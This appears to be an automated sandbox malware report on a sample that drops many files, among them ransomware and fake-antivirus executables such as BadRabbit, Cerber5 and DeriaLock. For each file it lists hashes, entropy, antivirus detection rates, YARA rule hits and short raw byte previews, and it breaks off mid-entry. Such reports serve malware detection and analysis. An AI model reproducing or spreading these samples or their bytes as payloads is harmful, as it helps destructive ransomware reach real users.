                                                                                                                                                Preview:PK.........q.Fn....j..U.......Endermanch@AntivirusPro2017.exe%..........J.....5T...........8..K....C....w.+.&. &3..MT&.D..$`u./e.R.r.....=D0........O..'..r...*..%..zu.....]nT...b8c...5.{....$WeHK|.Ocb....h.6#.qD.*Y.......\.t....?mI..;._..bm...........g....2....R.n.&..{y.......(..N.q.2P.\(.+.O..$a.w`.3...%.\1.A.I....qc......Ci..D?a......].....;\mk.(.F+....[$.p.|G.....<.b\...Y.z+7..^...3l.D[..(...=q..Rt.}........}t..$s.!Z.e...W..!..)....nbv...-.../....?w..G..[..eo.iKP..:..l=9..lk.R..Z.Fy.I..}T 35.....v^..G.{.%$l...~...d]/-..F.t.{0.lD).oH..-r...2.e{t.._X.................nA[.S..D.$.4..p.&.......p..L...:"..M&..H...8.....o....|....79.6R.....B.S/..w......NA3=...c.....T..[..2..I..&.N......?Bj8p.t...>7.*..}O|Y.u.......~..,...RM.wO..].g...>\D...o...K+..o...;b$..\.6.z..o.L..(.jD._.A...\..M....y....p...[v..7.8RPJ..y..RdH..d..%...w.!..P=.J.m,.....<.`;^.:"...dV.f?tC.2H.....q..t...(....M..L....C-..<^.../.ZC..h.4.u..w.+"..~.).0P.&...;2.._.....X.....YB.I._~i.bc,....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1410736
                                                                                                                                                Entropy (8bit):7.999854281040059
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:24576:oSL6Ntp05P6ftXeQAPm1sPj54cubcZDUPKrFusldmR8uCbdfxgEgL+xTbQDE5GYJ:oftFtXr85409usl8R8vJgEdCY5n3Rv
                                                                                                                                                MD5:E1AC4770F42BAC0E4A6826314331C6EA
                                                                                                                                                SHA1:66493386AD995819871ACA4C30897B6F29AB358F
                                                                                                                                                SHA-256:EABF7FDD31C5838D66CCBC3CA52B0F6EAF8120F83EED43F372F21E4D31734B73
                                                                                                                                                SHA-512:E691103064075B24B1FC2F5B4D1A1C2701EE7C5074C96A7FAAF284F975DE3D7309E7A3EA9B80FB6A2D8950A3B12ACEB22E3516777508CAC70CBA8BE48527F55C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........CF.\.............Endermanch@Antivirus.exe.z..o_+.....#...mg...$.YW..G.pCot.s...$.....R...a..:.....c.l.?.,r.)i..I...z.0.2F.5..b.F..Y..].C...po...".....(..>G..M6."7.~..}....VCb.._.U.L...........6o...........#A.[..1.......=..}.r..=B ....o...h.z.....c..h.o[.b...v%m.K..8F..~.m...]..../.i.d.B..]..........}.....2..z.n'....y.Kqx.3:%NEg@..._%[P.l..zp.....ai"...^L|......!X.....A....{...:......%..?.y.....=.R...} Q......K..0.n.Xh#.t.\....5....[~ZdF..%.T..j.n......?a;U..XO8.k..+...Q+..7...Mg...V.\...>........4...P.B"o.M.o.jJ..?.|h...<.....V.F/i.ru..L`(1.Vv.sd,.BD{s.t..+`.s.....m.b.9eh.... .3.../..T.q.: ....PZ....:v:o....wAV..s.....C......=..+...i.j. .G.1.U..D.zH+..}.k.!......q.....D..WL......7..L... .F....'..7..!...]!.:......tm,Q.DC....&.Vg..Q.A.\.;..>.[|l:...&Z.n...C...(..J3.O.*.....0.5..~.H...q.q...f..hI.4....(.V....:..V...}..2i&.?..U.?F....d.E....-tb&.U.HE.......1t..d....d...]....f."..%..Y'rD./.....p)......{..i............1.c.5)..Q...QW.pE
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):402632
                                                                                                                                                Entropy (8bit):7.999545291816681
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:KPd6ZnyRPZJhKymLkH+yDXZEyfMrvDca6:Koy5ZJ7BeeXmb8a6
                                                                                                                                                MD5:61DA9939DB42E2C3007ECE3F163E2D06
                                                                                                                                                SHA1:4BD7E9098DE61ADECC1BDBD1A01490994D1905FB
                                                                                                                                                SHA-256:EA8CCB8B5EC36195AF831001B3CC46CAEDFC61A6194E2568901E7685C57CEEFA
                                                                                                                                                SHA-512:14D0BC14A10E5BD8022E7AB4A80F98600F84754C2C80E22A8E3D9F9555DDE5BAD056D925576B29FC1A37E73C6EBCA693687B47317A469A7DFDC4AB0F3D97A63E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK..........XK.._.$..+.......Endermanch@BadRabbit.exe...IS. ...l.).......m.._.7..FS.yC.h.-o.l...4.7FO.....?.X.>*k..Q./+._U.x@...SF..2...!7^F.v=.e.........*.SV....an. E..af...RK.z_VM..E......,...N......xD{~....t..r......o..4....i_p....S..:2.....(.b..=.7..A...'`.........1......5b..k..j.B.@.N~..r"..:.e#.`.....?`..K.).....ll....NC.!...... ...u`...b..$..SM,.].Z.Po...W,Y6....S.q...{...y..V.C&.][.T7....].l....=..."=$\..!.f.....Rc......fU.......Z.tu.....pJ.|.....:.m.~....z....7_Z.&<...&7.w.?Q.*rq. ..E.k.a.m.`..b.$z.i.w...Gwe.,r.H.rB6..)./[?...O.z....w.~.nO7"O./L.mM.,-.u..${.v85.ff.ob..a..}...:.pBY4f...D.WZ...Hf.*..62..>...9....._r:QHZhX..0.n..g...[q.9...f...,.WcWLii....N..".....hsuD.....[...^.._..z.!.}m|..o...L...?54.P.2].$Y.......K z.....*.;Z..F.........]......k...*.4Ud.$.E.N.d.~...}BD..xg+.g....>.{.U..hkh...&...\...f..7...u1..<.Z....Q.......RF1Y.O~..3.....RM..;bq./D.g.'.y...QRVz.!.\w..!....I.L..y....U.V.!;*..7).0/..5D.M..y.....{....g...Q.%|.V4,_k]3
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):116134
                                                                                                                                                Entropy (8bit):7.998443688728203
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:KS3AAMRbzhdikdvWC5PWTAiloSQOE8rzl7YP++bA4k5:KgkRbPrdsAizPLy2+b0
                                                                                                                                                MD5:6CA327B67F1A2B2A4FBB7F342E15E7BF
                                                                                                                                                SHA1:AAB4A7D8199E8416AD8649FEDE35B846FC96F082
                                                                                                                                                SHA-256:460A3E3A039C2D0BB2C76017B41403BF3E92727269F49B08778D33108278B58F
                                                                                                                                                SHA-512:B7A7574CA52885E531ACA71EBE52F7832F8A2436CDA047E7686936FE0337EAE7C4EBCC57DF27C26316871D4167EA4E6794BEB933F7C13EFB0ADDAC0D400E4D9A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........?...............Endermanch@Birele.exex.Rz..Y.n..].&m|.f..[...t0"...!..}.[..[z...I...hk.H..B.T...........2dP;)eK.t..i.o....S.Ct_;Y...Y..q..D<....{..b......kI.y#\-..EGm._.p..~M...\...f.`...,..e2p.._X{^..".^..~m......C...2.r$...9>u..&&.....(@.....=..<5.....yUT.W<UDAw..(.+..r.......e.........0.....e,.]b`........_.~./@..6...&...p./-.2Ug...+......H..bZo.M.....^.'m,../..#..7....0.<c.b.Cl.Y.a...#....Z_.g.y.BH...HOY.cw.u.. .4\y...c..i...5.P[oW.1.|]Il.d\..s...T..%z.h.).....6W.-lGu..!.q5......!....;..m".z.h.>,..s.SF6...........L..Vv....V..C!....^.U4h...A.g@I<......`..r.#.0u..O.,..".4.....N.C.*5!..N,).lGy.*.6.S....Ox__d.........$..0G..^ <u[.& )...!.=............E.m..w0W...)..D....;Bs...".4...o....]...>d..p.L.'..&...{.A..N..n...$,m.h.*..i.,.lcP.m....NS..L.k"_.Ua.z..!T........S.}....}?b.h.Q#.....D(..%.l.....).I.uZ.R..:Ut..7"....#............7.jN...q5=.=a....\K...&.O......A.J~.....'.D..A..p...).....J_a...t\....."H.*... !.W.Y.>.#?...%AO1WkK.....b.1.h.
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185620
                                                                                                                                                Entropy (8bit):7.999024397332973
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3072:1rdfCdJA9AZODSf1MIH34E8Ylcg16hK1z0mZiPS6weJ2vbYEzoN:LfuA2D1MIHl8Ylt151z0mZiPSM2vbY7
                                                                                                                                                MD5:10D74DE972A374BB9B35944901556F5F
                                                                                                                                                SHA1:593F11E2AA70A1508D5E58EA65BEC0AE04B68D64
                                                                                                                                                SHA-256:AB9F6AC4A669E6CBD9CFB7F7A53F8D2393CD9753CC1B1F0953F8655D80A4A1DF
                                                                                                                                                SHA-512:1755BE2BD1E2C9894865492903F9BF03A460FB4C952F84B748268BF050C3ECE4185B612C855804C7600549170742359F694750A46E5148E00B5604ACA5020218
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK...........JW9.Zb...........Endermanch@Cerber5.exe.e...@.V..j.y.,yY...8..T....z.)..nI... ....~r\.......5r|....$....}<......=..@.:...`......:..wa.D..}..-(8\.O.&~...H..~S.O.).2._.}...E...n&J..?....;....v+...M..N.s./c.'A%.O.^p..a.....(+.)....e1A..E~.....D...2...y..,L.8Xh-......X...G..)H. p......u..U.M...%..hDOS#.s...W.2%'m.$u(.zA....C.W..<.b..8.x.?.......k....$..a...$....~.oF.rX.i.... ...#..{i.&...............iM7..%.....jc...b=).d.WX4?.....[_....p.1x.H...U.a..$.V..../i.$5.C.L.]sID.D..G...53..q:... \....N.\@6...F.R...Ui.=h"Zzh...V}..o.h.W.!$] .P>...kA..x.m......[...=$z.....8.3.U....G...1.<1].Z. ..L........3z....BW..oQ...+.v...BKe..V..C.....p.a...p(yu.&ip.....oC..`........O.$%..|.=..;X..."49..w..t,.Rp.Y.Z<].F\.ry0@...j.b...?.(....D.!%!gP....Qn...B..{.."K.w....ZA....l..._._...>)..Rm.@.1?.3.....DM......3M?..,.s/..N.<..).+[..n2?.6gH).v.>C.0...J.f.&.iF..%.d.|.>8u..9A.>./.U...U.+..0_".V.......%....kCi0*)L..M.Jq........R>.CA.oBOPI..N..\o.PoV..
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):215551
                                                                                                                                                Entropy (8bit):7.999084540418597
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:rly5xPXQYQtWnwNRIPbk7DLJSa/tJru36a6fijJ5/j:rly5xPXQQwIY7sax75fizb
                                                                                                                                                MD5:016D1CA76D387EC75A64C6EB3DAC9DD9
                                                                                                                                                SHA1:B0A2B2D4D639C6BCC5B114B3FCBB56D7C7DDBCBE
                                                                                                                                                SHA-256:8037A333DFECA754A46E284B8C4B250127DAEF6D728834BF39497DF03006E177
                                                                                                                                                SHA-512:F08653184D7CAF48E971635699B17B9502ADDB33FB91CC6E0A563E6A000AEB57AC0A2EDD5A9E21EF99A4770C0DBB65899150FA5842B0326976A299382F6BE86E
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:PK.........D.I....II..........Endermanch@DeriaLock.exe.^..N._9>.........N..Se2..5y.....g.i_j..dvp.j.K..e.6..-..A..'....Q..8..#j.O.....#<.w.D...<.._`06.W...!....K..,...yu.Be.i...X.;r.+...".`..........$.6..J~..Vd....L...{..+.,...8ly\.S...i....<t..^.l..{[.v.a\.p.E.....]MK.+7_N&G.TX.3F..`..<I....,\....G.8...O^.?..W#.......r..T[.<V@.s......<.xc....~.&........|.;..i.l.A+.N.b.....t..te..l...4....+.q+.F.X.:....A#.AA..U\k....M.L.#...N.".p....2..j.^.(v-.*3'.....e...:....,S../...r..z...`...]..G.....`.k.^...y..i.S....2..9.P.B.X..Q.`.]..........}kd...f.c...r.;j..{x8....,....RK.-Bc.7mv..a1.#.....c.q...Y...7.To...6I6~...s.W3.M...w......h..*!...C}..H..v5....|9..<..q..`....Z...2"..I.:......8......Hw.>..5.7*.2..{EGV.l.s,.xg..CK.................q....>..x.F.>...\...n..!.*/L.G..@g'...h.K.V.g....,....t.F.;U,b....3...7d...6l...8.kQ|.-...N.1......q..i....0.>......2..9.L.>.>...q.O.&..o.LrUL..{d..!e8.9..1....(T.....|p..T.?...t...{H.....M..P..\Rw..c...*me;..}.wd......
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1227610
                                                                                                                                                Entropy (8bit):7.967961253692764
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:Lutr5OUF7zfbMEsJiZp8uSOBpik+Qijrcq0y0JL4SprofsCghjmxQ:LuXfbMvGei9yjrcq0y0JL4ggghjv
                                                                                                                                                MD5:910DD666C83EFD3496F21F9F211CDC1F
                                                                                                                                                SHA1:77CD736EE1697BEDA0AC65DA24455EC566BA7440
                                                                                                                                                SHA-256:06EFFC4C15D371B5C40A84995A7BAE75324B690AF9FBE2E8980F8C0E0901BF45
                                                                                                                                                SHA-512:467D3B4D45A41B90C8E29C8C3D46DDFBDEE9875606CD1C1B7652C2C7E26D60FEDAC54B24B75DEF125D450D8E811C75974260BA48A79496D2BDAF17D674EDDB47
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9..9..9...a..1...a..*..9....'.z.<..0.l.8..0.k....0.}.8..'.{.8..0.~.8..Rich9..........PE..L...f.K..................................... ....@..........................P.......6...............................7..3....)..........`>..........................."............................................... ...............................text...n........................... ..`.rdata..e.... ......................@..@.data........@.......&..............@....CRT.................(..............@..@.rsrc...`>.......@...*..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2066944
                                                                                                                                                Entropy (8bit):7.407449411158182
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:FH/1Fdq0wneDrEoYxWFjmYMcKabLVp3diY7kp:FH/1Fdq0nIo2YAcl/NisA
                                                                                                                                                MD5:C7E9746B1B039B8BD1106BCA3038C38F
                                                                                                                                                SHA1:CB93AC887876BAFE39C5F9AA64970D5E747FB191
                                                                                                                                                SHA-256:B1369BD254D96F7966047AD4BE06103830136629590182D49E5CB8680529EBD4
                                                                                                                                                SHA-512:CF5D688F1AEC8EC65C1CB91D367DA9A96911640C695D5C2D023836EF11E374FF158C152B4B6207E8FCDB5CCF0EED79741E080F1CBC915FE0AF3DACD624525724
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o...........C.^....C.\.......O....|.....l.=....o.&....s......}.....y....Rich............PE..L....FL..........................................@.................................a. .........................................|....`..............................`..................................@.......................@....................text............................... ..`.rdata..............................@..@.data............<..................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):757637
                                                                                                                                                Entropy (8bit):7.942040838313248
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:kUWA3AheuswygKEOKlC0DaWL8ldxj1UT1fzosC2kyINJATi1v2yUQpf84i:kUWqistgKErL8P6VzosCfE6TNpf8D
                                                                                                                                                MD5:382430DD7EAE8945921B7FEAB37ED36B
                                                                                                                                                SHA1:C95DDAEBE2AE8FBCB361F3BF080D95A7BB5BF128
                                                                                                                                                SHA-256:70E5E902D0AC7534838B743C899F484FE10766AEFACC6DF697219387A8E3D06B
                                                                                                                                                SHA-512:26ABC02BDE77F0B94613EDC32E0843AC71A0A8F3D8BA01CB94A42C047D0BE7BEFEF52A81984E9A0FA867400082A8905E7A63AAAF85FA32A03D27F7BC6A548C3B
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                • Antivirus: Metadefender, Detection: 28%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}...9.o.9.o.9.o..a..1.o..a..*.o.9.n...o.'...<.o.0..8.o.0....o.0...8.o.'...8.o.0...8.o.Rich9.o.........PE..L.....J.................................... ....@..........................P......7...............................P7..3....(..........`>..........................."............................................... ...............................text...|........................... ..`.rdata....... ......................@..@.data........@.......$..............@....CRT.................&..............@..@.rsrc...`>.......@...(..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):835669
                                                                                                                                                Entropy (8bit):7.967994410818332
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:De/2dxVZ+ivtwdeOkD5YNfEp5UOc1+A4cMfZIYMlBlfwFyfr7BM9G/9V:6/iBFSkyNfI51cQFhMlvIofZRn
                                                                                                                                                MD5:7DFBFBA1E4E64A946CB096BFC937FBAD
                                                                                                                                                SHA1:9180D2CE387314CD4A794D148EA6B14084C61E1B
                                                                                                                                                SHA-256:312F082EA8F64609D30FF62B11F564107BF7A4EC9E95944DFD3DA57C6CDB4E94
                                                                                                                                                SHA-512:F47B05B9C294688811DD72D17F815CCE6C90F96D78F6835804D5182E2F4BFBD2D6738DE854B8A79DEA6345F9372BA76A36920E51E6CB556EF4B38B620E887EB4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                • Antivirus: Metadefender, Detection: 64%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].,.].,.].,.%f,.].,.%p,.].,.%`,.].,.].,.\.,.%w,.].,.,.].,.%g,.].,.%b,.].,Rich.].,................PE..L...G._U.................D....W..............`....@..........................``.............................................(.........`..G...........................................................................`..x............................text...VC.......D.................. ..`.rdata.......`.......H..............@..@.data...0.V..@...H...$..............@....data2..x.....`......l..............@....rsrc....G....`..H...x..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):441899
                                                                                                                                                Entropy (8bit):7.891913976230692
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                                                                                                MD5:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                SHA1:DE5C8D858E6E41DA715DCA1C019DF0BFB92D32C0
                                                                                                                                                SHA-256:630325CAC09AC3FAB908F903E3B00D0DADD5FDAA0875ED8496FCBB97A558D0DA
                                                                                                                                                SHA-512:74ECA8C01DE215B33D5CEEA1FDA3F3BEF96B513F58A750DBA04B0DE36F7EF4F7846A6431D52879CA0D8641BFD504D4721A9A96FA2E18C6888FD67FA77686AF87
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                                                • Antivirus: Metadefender, Detection: 83%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2.G2.G2.?..G2.?..G2.....G2.....G2.?..G2.G3.G2...G2...G2.Rich.G2.........................PE..L......Y.................0...................@....@.......................... ............@..................................m..d........p...............4...........................................................@..t............................text............0.................. ..`.rdata..*0...@...2...4..............@..@.data...<............f..............@....rsrc....p.......r...h..............@..@.reloc..N...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):119296
                                                                                                                                                Entropy (8bit):7.911347099102218
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:pYV/aVHN9ySTn34w33FVTyuGAxsvBLSqAKZqoqrxy031l3y:8adNlltyu3Pa5gr33
                                                                                                                                                MD5:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                SHA1:FB1E8385691FA3293B7CBFB9B2656CF09F20E722
                                                                                                                                                SHA-256:B2DCFDF9E7B09F2AA5004668370E77982963ACE820E7285B2E264A294441DA23
                                                                                                                                                SHA-512:76391AC85FDC3BE75441FCD6E19BED08B807D3946C7281C647F16A3BE5388F7BE307E6323FAC8502430A4A6D800D52A88709592A49011ECC89DE4F19102435EA
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                • Antivirus: Metadefender, Detection: 78%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................................................................................................................................................PE..L...)..G.............................d.......p....@..........................................................................t.......p.......................................................f......................................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):320760
                                                                                                                                                Entropy (8bit):6.315890725389197
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:nl578cxdGY87FohbnmM2i8ito7wTmCbL94KCT3OAmK:nl59zH8MiM2z+NLQBN
                                                                                                                                                MD5:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                SHA1:C07DFDEA8DA2DA5BAD036E7C2F5D37582E1CF684
                                                                                                                                                SHA-256:B3E1E9D97D74C416C2A30DD11858789AF5554CF2DE62F577C13944A19623777D
                                                                                                                                                SHA-512:266C541A421878E1E175DB5D94185C991CEC5825A4BC50178F57264F3556080E6FE984ED0380ACF022CE659AA1CA46C9A5E97EFC25FF46CBFD67B9385FD75F89
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: cerber3, Description: Cerber3 , Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, Author: pekeinfo
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                • Antivirus: Metadefender, Detection: 76%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`x...+...+...+B..+...+..u+...+...+...+..+...+...+...+..+...+..+...+Rich...+........PE..L.....sY.....................8....................@.................................{.......................................X...........0...............................................................................0............................text.............................. ..`.rdata...).......*..................@..@.data...............................@....rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):495616
                                                                                                                                                Entropy (8bit):6.338057450703654
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:lqHKx3YCgy8HmmjJpnVhvLqCO3bLinIz1wASx:lqHoyHNj/nVhvLcyII
                                                                                                                                                MD5:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                SHA1:01A6C963B2F5F36FF21A1043587DCF921AE5F5CD
                                                                                                                                                SHA-256:4F5BFF64160044D9A769AB277FF85BA954E2A2E182C6DA4D0672790CF1D48309
                                                                                                                                                SHA-512:2033F9637B8D023242C93F54C140DD561592A3380A15A9FDC8EBFA33385FF4FC569D66C846A01B4AC005F0521B3C219E87F4B1ED2A83557F9D95FA066AD25E14
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: JoeSecurity_DeriaLock, Description: Yara detected DeriaLock Ransomware, Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, Author: Joe Security
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                • Antivirus: Metadefender, Detection: 69%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`X............................~.... ... ....@.. ....................... ............`.................................$...W....@.............................. ............................................... ............... ..H............text........ ...................... ..`.sdata..8.... ......................@....rsrc.......@......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):195400
                                                                                                                                                Entropy (8bit):7.873003999274124
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:15TDpNFVbxDSXJFFGhcBR1WLZ37p73G8Wn7GlDOg+ELqdSxo5XtIZjnvxRJgghaR:157TcfFPB6B3GL7g+me5aZjn5VlI9T/
                                                                                                                                                MD5:248AADD395FFA7FFB1670392A9398454
                                                                                                                                                SHA1:C53C140BBDEB556FCA33BC7F9B2E44E9061EA3E5
                                                                                                                                                SHA-256:51290129CCCCA38C6E3B4444D0DFB8D848C8F3FC2E5291FC0D219FD642530ADC
                                                                                                                                                SHA-512:582B917864903252731C3D0DFF536D7B1E44541EE866DC20E0341CBEE5450F2F0FF4D82E1EEE75F770E4DAD9D8B9270AB5664FFEDFE21D1AD2BD7FE6BC42CF0E
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                • Antivirus: Metadefender, Detection: 60%, Browse
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................^...|.......0.......p....@..........................0......7........................................t.......p..h...............h............................................................p...............................text....].......^.................. ..`.rdata.......p.......b..............@..@.data....T...........v..............@....ndata...................................rsrc...h....p.......z..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2007552
                                                                                                                                                Entropy (8bit):7.761090155030316
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:p/VoMTzwF77l0VqmuTefhLTtk31XyXb9:ptoMTzwVmq3ettk31ob9
                                                                                                                                                MD5:CB02C0438F3F4DDABCE36F8A26B0B961
                                                                                                                                                SHA1:48C4FCB17E93B74030415996C0EC5C57B830EA53
                                                                                                                                                SHA-256:64677F7767D6E791341B2EAC7B43DF90D39D9BDF26D21358578D2D38037E2C32
                                                                                                                                                SHA-512:373F91981832CD9A1FF0B8744B43C7574B72971B5B6B19EA1F4665B6C878F7A1C7834AC08B92E0ECA299EB4B590BF10F48A0485350A77A5F85FC3D2DD6913DB3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
